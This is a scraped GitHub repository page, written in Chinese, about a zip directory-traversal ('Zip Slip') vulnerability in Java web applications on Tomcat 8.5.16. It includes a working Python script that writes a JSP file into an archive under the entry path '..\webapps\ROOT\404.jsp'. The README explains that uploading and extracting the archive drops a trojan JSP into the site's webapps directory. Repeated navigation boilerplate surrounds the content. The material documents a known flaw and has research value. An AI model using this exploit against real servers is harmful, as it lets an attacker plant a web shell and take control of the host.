Java-Compressed-file-security java web 压缩文件安全漏洞

测试环境：

Windows For Apache Tomcat/8.5.16

0x01 制作目录穿越-恶意压缩文件

代码：

#coding=utf-8

import zipfile  
import sys

if __name__ == "__main__":  
    try:
        with open("404.jsp", "r") as f:
            binary = f.read()
            zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo("test.zip")
            zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)
            zipFile.close()
    except IOError as e:
        raise e

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
README.md		README.md
test.py		test.py
test.zip		test.zip
zip.png		zip.png

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Java-Compressed-file-security java web 压缩文件安全漏洞

0x01 制作目录穿越-恶意压缩文件

0x02 文件上传，点击解压缩，木马文件解压到网站webapps目录

About

Releases

Packages

Languages

jas502n/Java-Compressed-file-security

Folders and files

Latest commit

History

Repository files navigation

Java-Compressed-file-security java web 压缩文件 安全 漏洞

0x01 制作目录穿越-恶意压缩文件

0x02 文件上传，点击解压缩，木马文件解压到网站webapps目录

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Java-Compressed-file-security java web 压缩文件安全漏洞

Packages